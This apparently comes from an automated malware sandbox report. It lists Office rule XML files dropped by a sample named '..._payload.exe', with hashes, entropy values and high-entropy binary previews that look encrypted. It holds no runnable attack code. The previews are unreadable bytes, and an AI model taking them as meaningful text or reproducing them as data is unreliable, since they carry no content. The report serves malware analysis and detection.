                                                                                                      Size (bytes):1073
                                                                                                      Entropy (8bit):7.793659021713939
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5iLmw+NnAHBAgnm23JCVyX23h1pg3CtUuGTVbTue8E2g4PXUv6bD:5iLHQnoBAMvX239UzVRlmUwD
                                                                                                      MD5:4C94EFED8E73E566565E7EE1CA724A63
                                                                                                      SHA1:34B11513450F9D138D6D08D5613F880D12B8E6C6
                                                                                                      SHA-256:189E98CC4A2BF2903CFD9610DD6EFE0BD86D2D4094D2E2AD09077704FDA31BE5
                                                                                                      SHA-512:EEC71447678DE8C934FE6499D379E5068BDA2146635089068A2D0ED3A513D5E40EF799F222A464898B6F53632239EB51CD167218F021365BA352E7E2C0414E5B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...*fV.f......g@.......I....U`..K<...I,.e^M..[.....(...i....F.%Mv.z.......*...O3z.7.N..j......N@...C:n.%...G.s..V..3P......,..c.bH.......d'r.....CcE....V..~....b.t...Lx6YK......_{............ 3O..'r..Q...0#=..$......e.X.nI.\..........l.".e........&){...:6+..@..G..1id.(..4....!.n.........`.?.....s.e'].t...l........F......k.Q3.Ea...f..6.y..N..>>......J.o.L6;..Z....a2..8.x.B..O..0..*o..^o=L|RN...~........n.....^.........ab=.r....B.<.j.1.d...d.=.{p........~...{..A.2Mw......A.a....T.^.-`...n.tT.y../.....ru.Q..3..!.W..........L%.sS.y.. v..d:....[k,?..tW..z.w.....u....---..2..a.]...r...(ejf.4..H0.k.,.GJ6.!.x...X.Q... .....U3#.....2.ye.OT.i...... .8j...*.qy..U.B3=.....M........_PscP..M.....\K[........Q.Q>.../g..U.=l...bg.....j....R..r....>.]IV..3....{.,....._W.f.j..[V.....k~......u...Q\5@zw.....Q.+.E..p\'-..7..S..).q..,..(.e.....h....Ua.....n..p6d.....{..f.G'..m.."..Nn..#.j.v...D-G.....||.A.`.D..wx%w.=..,.Y.$....4}K(..n........a)b....hZRMD

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):933
                                                                                                      Entropy (8bit):7.786858361980401
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:gdchtz58lAfhbqcYScowJfMVHFQvd5hIj9GWBQ05gguTv6bD:gdchSiOcYScNMHQkJPkwD
                                                                                                      MD5:D05FF74442B2C0027D997E00A1474D86
                                                                                                      SHA1:F0546E4D313556F92C95907F628CF678F4A3A071
                                                                                                      SHA-256:454295C53830027D67FBE599966A71EAC72E8BED952FBF18CBAB31A0AE3169BC
                                                                                                      SHA-512:BE3A3501ADC6AAA2A9951BC11F27F65ECBED4F8F401B3532B4460A8AA97EDED0AA4DE765C278AEA3187498AE81999EA85B7705FBD9CBDF3835F1B785C329062C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml]....7.#...~Fy..(.4)..@..$.n...#:>..je%..U..9'..._.~fd.Jp.W........k...~...l..1..l^.JV..Y..S.c.*/....N\MTd-.].....?.%k.H..Pq.R.....42..D...K.bV.I...g.Z.0_..w..g..&.d.m.@`sf.R;.G..(.3y|m.z9.o........%.=.#4.N#)L1mof.....y.]X4@^0\......p..9.Y..X.{.0.g....OF....4..w+.&c>.p......?..4....t`.-D..-6...4.........;.D.GPae...\..3...cML.m.Gk.._\6..M+_....!....<.N~.'.........t..g.Xua.....D.@.........C.-kD......c$@.6;JRzm...L..?6..,,)...rNr.......h[....W.`.B..........vF...c/!...t.1:v..B...).FA3.y.@.=8C.$#W..J.|.....#......?.;z....C.q..2X.q..M......>\&.2.8].#..C..;..a.U...W../.)..=/....?%..R...9.;..L...de7.....t'.......rEf.w..]a.f.\..}.5?!..m65...O.+j.t.!`$...t...&...k.~..6. ..\.... ...s......>...RS..."`...;...F.UZXc~Z.>.].......#..i..`......OT...|..t'...}_"....G."I>7.....lP....B...h.\.d...@lT.,....@....0..f..^S'.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):933
                                                                                                      Entropy (8bit):7.755859086278109
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:u1VcONlHswlfvVh1UYw2lDitNcRN2DbIPoDo+v6bD:uV9NFzlfvVh1UYwUEG2gADzwD
                                                                                                      MD5:A5F1BE290AB3600A5565C7F22781DD33
                                                                                                      SHA1:BA136D141AB17DCB4ED455686026B8D227AE7EB1
                                                                                                      SHA-256:CD753D689B76AB5CE6A517716A298D5E0FDE81F4F969F079BBCDFBBF062152CA
                                                                                                      SHA-512:C24EC945EED4E276377E07A9865994203E887DABC92B20D4A44027D42AA99B81A3F3CEB22EDF98D7974A6864D89EAC74601AB2339B3989241502D42C682E30BB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.0.../nD...q9..3.j<.>.......i...]...|.q..,.B:.F....._..vov:.O'...W...d...Pu...|5..i.L.<...3...m..XN.j.b.._y.(f.0.. .w...E<....]..ho...~....l..G...6t1v0!h.E{..9w..D..#.....a&....Z.....(..Zq{.0...$N.'.$..P.4....../i..K(..,.e.pc+.e..V....6w5.T.8...(z.-..B...".lS...pqs....h.....6./Ur.jm.g ....J.Q....Q1N...y.P}....L.}...e......".....?6.^E......x...p....93./..i ..~`....<.gC8........L>.?.H....9.....I....q.:.g`.L...........6.....".Q~.(....4...A.r2.6..\....p....2..?.Z.k..E..............*.....F....\-'kPa...=fST..#.=R.*...;..ULF.....).#.......~E....J^R.&......'..Y..A.i&.1..E20..N.g..I.....sd........yn.9.Y.<....r...5.2W4eF0....bY...Y'.6,+.Xx...o)\L...^w.aY...Z.........'i..r@.jxm.6...GY..aw..4..............$-..Br.!......9@B,`.9.UC\y%Y...*%.T/..y.i-..`A..vNa...]-..n..$....O.C.f..5..?g.Y_...J.....P.5.-..I~.-K..?.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):945
                                                                                                      Entropy (8bit):7.783023338908897
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:uaqOfPhe9Tws8tGf4VJB4pT/UIcj4FgqYXlv6bD:1qIg9Tf8tNBK6pXlwD
                                                                                                      MD5:DDD6366993FB46C7187B4F031B2C0882
                                                                                                      SHA1:0B1DEECA51019F46B53A6A8E95C2F2E95381E7E6
                                                                                                      SHA-256:1CC7E0A7C1603254F3FB8B42B65ABD32191A057656ACE61B197D0CA968B74DE9
                                                                                                      SHA-512:81474A34937C582C1D939D9836D15AB0FDAE73F091193998CCF1AF378C1FB645F82FF04D7BD1DE88AA38A4C5F3B523484849D894663F7BE7D6DB79D742D2D6C1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.a.+<Vz....:LgA.if.Q..q....a .p."_......'q...z...1.g."..g...-;<.p.Q.o.B..d%}.9...X...i9..7g..U&\1..7.o......-c.[..CDG...e.Q.I.&<.B.h.9r.t..(..]...w.u..#.v.2-g..}.4..>....Ry.@.P.p...i....x...w.9....lb....:Z.G...I..6c.o...].C.......L.......t......[.|.}.A.b..._....Ulz..Un-......."_...H.r.#..xb?..vf7Y{..4.~.....e\"..... ..UE.........!V.'.U.(l.S..h.%.&e...^h..i...x.K..)B...T.k) .K'.*.E./.6f....<,....X.Nq~_..o.*.v......@.|.\A..l.R,......V.L.%..>.v..:.....-.:....b...!sW.wa..N."...~`.u(...\.L.Y.......$.J5.WiT.P..@oP..2w..v.c.n|.....UoS..G.....r..b.x.m/..N..0O%85f.?.?f.*.i\.0..V$o.s.....?X.n.....]..3.g9_.K.X......T...t.g..5.c.a..s+z...c...d......G.5a.iO@@"F.).x.=......<.O..B.....5...B...> ..@3.j.91.;9...y.e...p>)t.D7.:S...b`.zl).*T...>..!.RV...L)X.Q.%>.L..*..y..t.y........$....'e6Y.!.p. =.9.[x..K.....y..y.sg.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):941
                                                                                                      Entropy (8bit):7.7957621630439435
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:oC7/QK4L8eqR1hHs1HSqR6uK5vgHOwCv6bD:ou4Kc6R1hgLYvmCwD
                                                                                                      MD5:F0079FD292796535F7DB59B8CE80CCE6
                                                                                                      SHA1:315F8174542D695572041FAE870B5BBA89D063C5
                                                                                                      SHA-256:AA6EF5FDAA2E723E36E60A01E02EFC49D627ABF247B23380468212B0C6D34CE8
                                                                                                      SHA-512:926199A312E26F49A3FAF06E22797DAD142B4F529546420C24B77068C34EECF8278E40936CD2D28212400C00993E217225F3663ACB40F897B67B55606ACAA3CD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml@cD.O..i.....H\fv'x....r...Pq.y...I...Oz...9..ei.w...h.*.z..%6..n.}p.-..Ke.TNS3Vxuk.J..]......l77rz...k5=#.Z...o.6=.C*5?..b(o......,4v....~.....dX..T.....(..1\".3.".2....t....(..A...w.(>r..Qbw.%A.9...!.{..q.j...D".\.q....J..../z..!u[.......=6.i>.]F......e.....A...Y.^..c.u.r4mb...hV.av[U].%S.p.a......P...Y...X..U/..crx.o?...ik.......C".V.\.9...Mp.....&$wNV...O?.:...K4..S....E.N...N..e9[......B.~.W...X.g......Y.1.5..r..U...j.l...*wM.T.V..f.+~{hD......}..>....'k..i..z...z....~P....:......}..Z..p.%.?>....kW...%..j.@.0.\~.1..S$_..)N..o..C.iWd.ty..u1H.T..^...O.tY...-?.PC..fu<......(tp...{....z$....u|&.<.7TKr....&..|s5,-..'+F..l.IE....[|......>..B.@.....yU.lk}......(;.@...L.h.............!..st.R....@.T..n..t..~s.W....E@..@..vM.HC...^p.k.Z....W.t.+..\r.E......<.]{.....p%.......Qa..-...[..@$...L3l..#.n2..$1..(.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):945
                                                                                                      Entropy (8bit):7.745931887938697
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wrUEzjORxpjbdP17tePvHHEMrdchD2opwQ1324zv6bD:eUrdP14Xn5rq15R31zwD
                                                                                                      MD5:7484A008D62CD4E389C97447339C816A
                                                                                                      SHA1:671785AFD77C90CD22DD83C6B6D0E95014B40BB3
                                                                                                      SHA-256:8077610E20ADF0675BB7BB641D916A806E2935B54F947E68671AEE8702404E7E
                                                                                                      SHA-512:3FC604F58F39710937AFFA55C7DEFD7631D777B2927006EDE266B046A5C5FBC21AD5FEF7BDAA280DC3AA9BAC499DAB57F6B72FD461AD7C6F0DA4D04B3C5C3DE2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlz.t.h.=v<.<.=...9.BQ.F.I..7.Z.t..<J.X....b.YD..5.}........5....i.2.....@..l..t..'/9.:..1&...AAk..M;9....e..w...q..C+a.....6...{9...F#.y..7.7.GS%.iI...}.E.5r...t.i1..U.?...2...=...l....z.#.I...h.h..L..@M`....>..,.-8.3.drX.7K.b.J.T?{.....l.Ar.@Ow.$.le.t....y..'.....U_K.iD.....m.I.z.Oz....0....,|j....p,...8.....Yf|.1.....S.O...$Y._@Q...Q!...7.K..;.\........lC.Oc..'...5.u..oH...R.(.a....1GB....s.z._.|4.....o.q...2}0...E..........F.....|s.].D.`.t..7........o.bG:P..Qa.r.A6.Y..O..QZ......f....0......L....)O.(U.....~.VY.....`....6...4.."ki.Gz\(....?..a@",..[.i..G,a.....IU..SAn.8s*R.nc..........#...'....gW=......j.v,.........\f.....(5....._L...c..A..h...Y.......5.o\`......3b.@.d(.t..p.m6.S0\2wE.o...0Ua8.D6.lJ...M3.....m.........W"O .8H...d.(.sa.M...n2/.!|d......U]5..n...>...w..B.3..uH..'.s.<l....xy....uX!c....n.;*....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):945
                                                                                                      Entropy (8bit):7.744563475461612
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:1VD5WiQ9JtgdMZtMjiN6Hk1Qxk0sI39CO57Ty/51v6bD:1LQLmdMMjrHk6Tla1wD
                                                                                                      MD5:46E5CAC677F36EA75C7C3CD8A28AAA86
                                                                                                      SHA1:EDA577B78142A3319632B64E809FD11B8EFBF5D4
                                                                                                      SHA-256:792EB593FA2239BBA8AC8C34AC7345351617CCF3B9CD28F2AC3A95B984E1A269
                                                                                                      SHA-512:056404DC80A05B3A6998CEFD52A562CC3B59ECA64A70B988B7375D4416DC48257314514F001ED36624C819C49CAF1937394520C5C69290A7E14BFF404D7723D6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..@.C%.^0/a...Na:.H9t#x#.k.~v&..I.Z..d..V(...5".a...K...ehv.J...b......8.R.9..M.S..o.sl..q....`........v) ....T$.ZX....s~...Ht.7%.7.r.}fB`ON.F...>....F.-0.)&..$<...&.....J...R2...A..+.dE...._A. ..q..2-1.-.k..`l.N<.Q....x@/.WO,.*.T(,....T._.WZ...xx..I_U.8H..3E..[YJ..BY.iM.?#vJ....J.....MT~X.k..^h.....&$m...5g.....K.....z..,..\...C'...p...s.*..&.u..H{~..$....,6.$."1...9fZ`?R.,9..%.L.k.ee.@..i..z...FI/...{..x.OR....3...k.E$...w_.w.-..T.....9.j=..........P....j.g(C....-...p..6.U!.(\.,C....xl).0lF.jC.(..C..[&.?.s...Z.v....o.s....2q#.*..H;H....n6..e.......;.....\.Z.8'..g..D...K.e....?7...{...|...,.....'3......KN.c$~.<.UsA.=T~.......?],q.n.;...L...R.B..".B.(.>.j..2....s..k.0@..)...5...{,j...?...LE..."l..j&....~.my.<...M....7.7C...K.8.F#.....1...WM..BT0.... ..a.....G.Jw..hm;....r....I..R=.T.=.&>.w...V....._.L?ihZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1000
                                                                                                      Entropy (8bit):7.780410079590039
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:g8BmYXQ+qPeX+FvrvsxugP8MGju/V8dqv6bD:PAFvrvsxugP8/u/6gwD
                                                                                                      MD5:8022C8CA5B770213876DD6C8A97C20AD
                                                                                                      SHA1:7645F1CA365E1F52436DE865A49829B380B2CFC7
                                                                                                      SHA-256:94224B3C6D38257342E3FF06FD0A8C905BFBDCA961455F73BFA5900765218C44
                                                                                                      SHA-512:585B46C3B9902703BC8FE5400B2A230D7EE247EE54EB18C6FBF972270F597E12AA0FF70CB229BD1E7D2CF4D11D91E209AB8CE7DD8319D2A61017D19927CFC830
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..!.:._..?......n.z.P..lW.....-...R3..J...PQ...f..X........`,.y..}..5.....X....=..A...r...`.q.J.......9/9?7....\f.......[Y..L.."g.......N..[O<.@.....p..1._..w.Hw.q);/%.&..|.7.@..r..G......>.&....Qz.:.6Z\+b....9...}.q.....L.}..p.8....>S...$....f~P..>.LL.Ey..Z.(J.:...2.?.cjR.W..o.. ..#.h..-|.PU.%v.."..gw./..t....y...t...K@..h./RG._.H..S........ .O..~....h[SC..\..X..0...t..q.:....q.A.......zGD.m....f=.Z..D.ev......y).=.{.u.+gq.......'.@..x....2\.!..yK]:e0.O..z.R.6..&.{..]...X0u.Z..I.c'?.\..4.B.jN..*^T..5;(.....{a.e3M.....ae.Q........H.L..T.&.L..J0T....$J..e[Hv6c...^.iX.]pC..V..A...(.=...Dw..f.d..."4N..z,%Q.Z..l5.c...w.4.*q......w...X...&..uP..~.H..r..{...'L....j.%d.z..l`5T.._.C&..D..(.+..8.F6..P'...R*].@.;...m.....v....e..w....cE.+../.ht./.....<P.D7.O..........^.O!xF.....K*..4...7..J..{a..0. -&._)..t":..&u.q8...u.= .....n....i.v....."^.....i..n..G ..S.h..=9!.&...,hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1498
                                                                                                      Entropy (8bit):7.876349981353629
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:C2hb87dAOl9/01/xyF+Eobg0YwiD5DhXrV0CThENxTw/W4eNeQlUzHboLBR7yi2Y:Nyrfslyobg0Ywm9XBaxTYe8QaoSh0/Qs
                                                                                                      MD5:185A355228EDE73306DBA02920A8BF2A
                                                                                                      SHA1:75BB3732C8A07061C6B0F068838F46793D55C326
                                                                                                      SHA-256:ABC3AE4EB9F7600404E3F382CD337D600E7F7A1EE465103F82DD06F8ADE81805
                                                                                                      SHA-512:A381BA5C6CB4EDFAE80284A6442813265FA11209C4457F74AADA08A1A48D7A86BF612B7224D914AA9322F81C8E0C974D284681034C4D6DEE705735B86D997572
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.>.S. .....N.H..E.U.......I4....Y..c....2...f.}..c....l.Q{....lZ...m8L.v..vu....h.FP.|.y.4j.i.J.!...J+.Q/dD~........L....?.b!.n.r..U.1&...?...q......+E.+........h.b..@$..@..}oz.t.......k,.........O..FcG.B.eF.:T..g.y.P....#..11.......k.......`mQJ.. .C.....d.<.P.^.P_H....a.S_.dJ.....X.....;..1...W-M...x..Z................Q.)Z/>.T9.y. .9...J....W....R....6.g8K.1Rg..y..Vh.7*..`....F..-.V...gy..@........H..sw..I...1I..>a^8-~.H..S-.d.c.=.yV..y<..e......'.ft`B....n9?....3l........Q~..%...z...Tk...UMj^j2|...$.@.L.GP.t_]\{..^...6.C...s.....V....\.7.P.xwm....=..j.=&#.....[....V.&.J.f|G..\..v.*.D.i..(Vi.dYlo5W.Oh.*N...&~.:.&p3...6..... ...).j.w..s...p9....F..V.J.w6|f.'..A._..N=...2\......?..4.....u.`!..~(4*;<.@"....&2.I.*t..\.....T.._6"...}......x.;..0..6.z`...9.Wy.-e..i...=6.WX{<Hu<.;&1...\....3.Sl.(n...Mv..v..g.. ..hGqzT..Wuj.n....,.9...-.....|....^g........#.&.....?2.....Cv.(c.u....qx.mwGZ...W..k....>..............@.e,]V..sA....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1357
                                                                                                      Entropy (8bit):7.857599130725083
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:sN8g7Tl/XGQT4S1rXW1vDFKrePtgy3g6yFkWLfFcvFZm5Xclgyq/Z0ioP/gWFv6X:E8gnpXGO4CrWZDFKreO6UNjF/5MCyatl
                                                                                                      MD5:337439418EB15EA3309F5DED9E7897DF
                                                                                                      SHA1:80B9F2B621A61E81560D3E75F1444567F87B0B86
                                                                                                      SHA-256:1319437E09740825500F905E57EA69494024902228F202C3A532E193C8888CD7
                                                                                                      SHA-512:DCDA8F0BC01807602991111830BDE0E97103D4B5EDE83A7BFB20A4A52145763A662E20B7F23877CD3CB46403D52EA09EAB67E0BEF704C83A24A4B4B0E05C82A6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Q&.......HC^..j.....G(b`5. .....dU.I."..h)./.....$..q...g..(...Nd..2(~.k*..G....n..ci...g}.......`......`..l..s..g...b=.`........:%.a -.HX...[bJ.:....r.x..m.6.R!X.S.\.d..m........=pcNvfFU..q....$...K._"..O5...d..G}.C..6....L..V......].,.'b......R .~(..&o..].Ay../..I..3.F.A...4,h=......o..~...To=.Y.].....P~......}...b...a..a..Sb..........n.]...`..i........1..$.....~...k{~O.ib..@+....B=...1JbXf....]S...61.......4%...8}>`...cXO.s....j.....O1._S.].h....h.J.y.....X."X+..FT.F...#...(l.Q-...W........H.fJ..Uh.+.E...z.H...-a.......1~......{.T4R.b....?.h......Ea.|..Y...z?p.1..@.,.:1.......D..B2.Pm...7...o$....A.?.f....u...v...E..n..@#...A.p..+a_.9..S.P.1.%..'..n6v.....;..(......U...*..3.f..=......M.e~x6Qs.r .H...[b..qiZ..ng.4.P.o...H...K...)i^...^..E>.:#;Is>..2.P.&..j..r.-.;.WO]'}ZE....f.g.........2.l..+)....7.H..eA..(.0..@.DP....g....n.O....is.......Tt.(.c.]QtD>..../.Y...cB..E._..y....w-..;.~.h]...r..H.......F...._6~YM)gu.../.x...7..j..., M.c.U..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1049
                                                                                                      Entropy (8bit):7.795976905115875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:p/MCF2IskzQ9itBXv2dnCpKw5tGqT6IA1TIWErMp6/ZB/a0Lv6bD:p0vIsUuCphDuIACprMY//acwD
                                                                                                      MD5:F4BD8972817DF2DFCDD942A4E2E72E85
                                                                                                      SHA1:CC6DC21BA03E7AAB9617EF06891F7F14D0C1FE29
                                                                                                      SHA-256:03C611F742C7D43ABF232486479EAABA73CB1F86FB314FF9ADF5D2586E439573
                                                                                                      SHA-512:EBFFD05C1BB668258FEDE0103E0B133E9994F1DE0E3414E6D08D9197F3EBA7588FA66921D2FB649BF6FA77056F7407D526CD3EA3616A23C164FE828E11936E0D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...F&._/.....*.=...eJ.W.k..Y.*...+F..w..7VZ.r.d.i...W..;.!.}..Y....?.B.C...+....MI..RI..AlQB...##+.#..6[.##.....h....D.O..-@P....$J.Ti.n...nY`..D."1...q._....i..{...~....7o....'.-i...V..j.%4...OvM..9.-v...m.0!.V.."Px.z.;SuN;...Wq...{.s.....I.]...#.K.0~....c..08.9......%..S{._.q.^HU..?.N..3.w....N?[..3,.Yz...\...0.I.?.%......7.....AA...D.=Y|X.6Y=dC..vI........Q4Cm.Q[....m.aYB..u..O@..B.....J.Bbc......X.h.E....! .f.hny\...A........;..>.........Y.e.p..|_W.!...8ix<Y.h.......6:.`.....x..B......*.?.F.I0...v6y.....*.....:.d.g/....6...{.Q7..vT..m.q.....n.......:S..4........o.d%.V...].Q...../.>.2D...)E...!.J.#..@..8,..m.....`..&.[-D.|......b...o#.kx.p....,*.....]O......N...Q7.....I..w..L8.b.cR...3Sq.f.?bM.3..4pm.h...z..6tF........eg..>.#.Y5.=p${.\p..e.+.G$/Z$.....{.0....-...m{.y...6.C}...*iz.?"w...Cn~./.......[6.Pz".0..}^.I.N.`Z^p.pM.?....J2.x... 1.D.S...\..w._<.......~|.i..8..2..2...J...,."..q..MwLD.\...W,{.a.C.hZRMDGn2o1XdryxaQbOJI60EuHBvA

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1184
                                                                                                      Entropy (8bit):7.81429392929645
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:sjDSsOQKY6kTQLuEMJ157oU4k0wRKZsob4plI5T2x/Xzm7v6bD:3s4YNTD34oLRqH4pc2x/Dm7wD
                                                                                                      MD5:76DCD927C67FB654AE7C0EF5A06F0066
                                                                                                      SHA1:C8D3C0FD82934B8612AFB08CC70F42AA0159305E
                                                                                                      SHA-256:19AFABBF58F59F6ED028609908E9B4A2DE4681063FC04927DF2D4B5156FDD370
                                                                                                      SHA-512:F2148DF41E74110CDCCCA3EE7E1E691DA57EC3BD3BCC1DA37E8239EBC10BB4CF94075FBC72D8F25C894F32A3EF72A60A2A088EB1F8577BEF765041DC010D489E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlj........d.ri.~B6s7....bQ.w..k,.>.g...&.0C.+..8..IA.Z...../.Y.....7.C.R...q.j...((J.....b{.`...z.=e..&..{...g...y.....L.8.T9.u.....U.3$......py.0=].\.PhO.|#...r.K8........q./.6Pct..3..>.vU1.B)...u.7..-..a5*8..E...wG....a....U..."...s;y`B..Z.....N....8.S).D.H.W.E.no..Z .ceX.........Y..*9.3.Y.........kaw)..SO^..b.?.S..d.x0..v.(o.....LC.^.=.u...8...xL....UGa....D......5.....'.kahP.O......GG.g.gzf.5.L.p..zy%.%)..M...|..o.g.0.g..B.,....R.2....H.OhV9.wB q.3..Z..k-.v..s...0..e..Z..C.3l....--b....!G..s..[....Ly..Ct..........LJ...r..K.M.nA..R..."@......xY......M...E6dmg.../T....zN..@.'P.?..6.x%X...:8.0]..tx...8+...i3)2.y.(.&f.......v....Q..........Z.F..\...g..S.U =`...7.C.....`...B...Z3R..k..tY..M&............1Ws.E......b.Ok/.?.... cq.....".Qt......X..Q&....2L*0.%%)+u.L..qlTQ..#.a.$a8f...o.a.=..S.g..V......d....p...8../N>.N./,..".N..d.]..O\...n..............&O......0...52:t;...I..0{.3...9Hu.(f.....w(...M.A.#....}..K.b...9/!.M+...BL..$....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9303
                                                                                                      Entropy (8bit):7.977786789682893
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:aDDkNbcG5G3WMadekclTOJdb1SK7i1Yu3pQvG7CYYiLS0XE316:aDDk1cGQ3WMaYXTOJd1SX1B0G7LzS0XF
                                                                                                      MD5:038F24D71B7AD036A91CA593AA1DEDF8
                                                                                                      SHA1:D1798EBFBF5780131319CF9123A734B704FF37E8
                                                                                                      SHA-256:6EE6F635DFC426C77746ADD470AC634B7E97EC02E79FDD910624E13B927E6209
                                                                                                      SHA-512:75EEC33E503BDB5DAC63A83CEF64ECF2073162CACCD1485CB19EB6B15FF82666C461CDA42D10C54C1B888072CE29DE62715A107D7B44DF0C698C927370833B85
                                                                                                      Malicious:false
